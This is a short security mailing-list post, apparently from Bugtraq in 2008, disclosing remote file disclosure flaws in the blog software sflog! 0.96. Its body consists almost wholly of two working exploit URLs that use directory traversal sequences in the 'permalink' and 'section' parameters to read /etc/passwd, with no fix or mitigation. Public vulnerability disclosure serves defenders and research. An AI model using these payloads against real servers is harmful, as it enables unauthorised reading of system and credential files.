[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
sflog! 0.96 remote file disclosure vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: sflog! 0.96 remote file disclosure vulnerabilities
- From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
- Date: Thu, 31 Jan 2008 16:50:46 +0100
sflog! 0.96 remote file disclosure vulnerabilities
download http://sourceforge.net/projects/sflog/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://localhost/sflog/index.php?blog=test§ion=../../../../../../../../../../etc/passwd